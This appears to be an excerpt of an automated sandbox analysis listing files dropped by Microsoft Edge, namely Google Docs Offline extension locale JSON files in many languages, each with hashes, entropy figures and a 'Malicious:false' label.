                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
